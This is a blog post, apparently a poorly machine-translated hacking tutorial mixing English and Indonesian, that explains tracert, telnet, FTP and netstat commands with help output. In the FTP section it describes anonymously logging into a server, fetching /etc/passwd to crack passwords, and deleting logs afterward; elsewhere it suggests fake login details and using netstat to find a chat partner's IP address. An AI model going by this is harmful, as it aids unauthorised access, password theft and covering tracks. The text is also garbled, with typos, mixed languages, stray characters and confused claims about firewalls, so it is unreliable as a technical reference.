The first line tells us where the trace ip and then the number of hops. The number of hops depends on the number of servers that exist between them. After starting the tracing. My first request via sify.net (name of my ISP's server) and then through a different server and finally reach w8.scd [dot] yahoo [dot] com. So we can see how long the procedure. Whenever you go to http://www [dot] yahoo [dot] com / in a web browser, your request is always through the isp first (to get the ip from http://www [dot] yahoo [dot] com / from the list of domain names ) and then another server in the path and the last on yahoo.

So how tracert used by hackers. This command is used to find the firewall and incapacitate. Tracer used in conjunction with nmap can know exactly where ip firewall installed, then the hacker will incapacitate. For the example above we see that the tracing process stops at w8.scd [dot] yahoo [dot] com. But this is not the real goal. That's because stopped by a firewall. Concerning the problem of firewalls will be discussed in a separate article.


3. Telnet

If you are using windows then 'telnet' is the ultimate hacking tool for you. Actually is a terminal that can access the remote machine and use the service. Through telnet you can specify a connection between your machine and remote machine via a specific port.

***********
Newbie tip: Here I am talking about a virtual port. Not physically that you see behind your CPU. Just as the physical port used to connect to hardware and in the same way the virtual port used to connect to the software. TCP / IP has a 65.535 virtual ports.
***********
If you mengentik "telnet target [dot] com" then you connect to the target [dot] com on prot no. 23 (the port that runs the telnet service). You also can connect to any other port by typing the port number after the target [dot] com. for example if I want to connect to port no. 25 (SMTP service) then Salya would type "telnet target.com 25".
***********
Newbie tip: Each port is running a particular service. To mendaptkan list of services that run on a particular port is open "C: \ windows \ services" on the notepad.
***********
Moment you connect to a remote machine on a particular port, a popup window with a telnet daemon that runs the port waiting for you to type commands. For example "telnet http://www [dot] cyberspace [dot] org /" then like the picture below is what I get.

I have to log in there and type a password and I get a linux shell prompt. Well if you type newuser there to get a loginid and Password. And the account after that I set up a command to execute remotely.

Well, http://www [dot] cyberspace [dot] org / have a Linux server. So if you are not familiar with Linux you will not be able to use the service.

4. FTP

FTP is File Transfer Protocol. Through this you can download or upload files. And what the hackers want from this? True! Stay typing "ftp target [dot] com" and the daemon banner will be displayed. But here, with the purpose of showing the file transfer you must log in first. Some websites allow the naonymous login. For example type the login "anonymous" and your email-address as a password. Of course you have to type a fake email. You now may start downloading and upload files. But for that you are of a command. At the FTP prompt you can type "?". Then it will be displayed as follows:

  1. ! delete literal prompt send
  2. ? debug ls put status
  3. append dir mdelete pwd trace
  4. ascii disconnect mdir quit type
  5. bell get mget quote user
  6. binary globe mkdir recv verbose
  7. bye hash mls remotehelp
  8. cd help mput rename
  9. close lcd open र्म्दिर
To mendaptkan help on various commands such as delete commands, type "? Delete ". A few other important commands are:

  1. 1. 'pwd' to know the present directory at remote machine.
  2. contohnya. ftp>pwd
  3. /etc/home
  4. 2. 'lcd' to change the local directory.
  5. contohnya. ftp>lcd C:\windows
  6. local directory now C:\windows
  7. 3. 'cd' to change the remote directory.
  8. contohnya. ftp>cd /etc
  9. remote directory now /etc
  10. 4. 'mput' to send multiple files to remote machine.
  11. contohnya. ftp>mput *.*
  12. sends all files from C:\windows to /etc
  13. 5. 'mget' to get multiple files from remote machine.
  14. contohnya. ftp>mget *.*
  15. gets all files from /etc to C:\windows
  16. 6. 'open' to establish a connection with remote host.
  17. contohnya. ftp>open http://www[dot]target[dot]com
  18. 7. 'bye' closes the connection and quits from ftp

 For other commands from the ftp please refer to help them.

Now on the FTP port (prot 21) is open http://www [dot] nosecurity [dot] com /. A hacker will connect to the site using the "ftp http://www [dot] nosecurity [dot] com /" at the dos prompt. Then he will try to log in anonymously. Assuming that http://www [dot] nosecurity [dot] com / using linux server, then the hacker will be mengtikkan command "get / etc / apsswd" for the password file and mengcracknya mendaptkan. If you are a hacker, then do not forget to delete the log.

5. netstat

You can specify a connection to the remote machine on a particular port, only when the port is opened on a remote machine. For example, if you want to specify a connection with http://www [dot] targe [dot] com / on port 23 (telnet), then that port should be open at http://www [dot] target [dot] com / . And all hacking activities generally use an open port. Typing "netstat /?" at dos prompt gives:

  1. Displays protocol statistics and current TCP/IP network connections.
  2.  
  3. NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
  4.  
  5. -a Displays all connections and listening ports.
  6. -e Displays Ethernet statistics. This may be combined with the -s
  7. option.
  8. -n Displays addresses and port numbers in numerical form.
  9. -p proto Shows connections for the protocol specified by proto; proto
  10. may be TCP or UDP. If used with the -s option to display
  11. per-protocol statistics, proto may be TCP, UDP, or IP.
  12. -r Displays the routing table.
  13. -s Displays per-protocol statistics. By default, statistics are
  14. shown for TCP, UDP and IP; the -p option may be used to specify
  15. a subset of the default.
  16. interval Redisplays selected statistics, pausing interval seconds
  17. between each display. Press CTRL+C to stop redisplaying
  18. statistics. If omitted, netstat will print the current
  19. configuration information once.
Options will explain their respective functions. And the most important is the option-a and-n. The-a option shows all open ports on the machine. And if I use the-n option it will show the ip address instead of the domain. I get the following if I type "netstat-a" at a command prompt.

  1. Active Connections
  2.  
  3. Proto Local Address Foreign Address State
  4. TCP chintan:1027 0.0.0.0:0 LISTENING
  5. TCP chintan:80 0.0.0.0:0 LISTENING
  6. TCP chintan:135 0.0.0.0:0 LISTENING
  7. TCP chintan:6435 0.0.0.0:0 LISTENING
  8. TCP chintan:1025 0.0.0.0:0 LISTENING
  9. TCP chintan:1026 0.0.0.0:0 LISTENING
  10. TCP chintan:1028 0.0.0.0:0 LISTENING
  11. TCP chintan:1309 0.0.0.0:0 LISTENING
  12. TCP chintan:1310 0.0.0.0:0 LISTENING
  13. TCP chintan:1285 rumcajs.box.sk:80 ESTABLISHED
  14. TCP chintan:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
  15. TCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
  16. TCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
  17. TCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED
 
 "Proto" states the name of the protocol, "localaddress" gives us ipaddress and ports are open. "Foreign Address" menyatkaan namor ipaddress with port that connects to us. "State" declared a statement at this time if a connection is "established" or listening or just "waiting".

For example if I open http://www [dot] yahoo [dot] com / then when I run "netstat-a" I would get input like this:

"TCP 203.43.50.81:2034 http://www [dot] yahoo [dot] com: 80 establishe D"

My computer with ip 203.43.50.81 through port 2034 to connect with yahoo on port 80

*************
Newbie tip: This way you can get the ip chat with someone who is. The first time you run "netstat-an" and look under foreign ip address. Now start a private chat with other people. Also run "netstat-an" and you will get a foreign lagin ip in the end. This is the ip that person.
*************
  
  
Diposting oleh Nyong Galau di 04.45 1 komentar

 
Langganan: Postingan (Atom)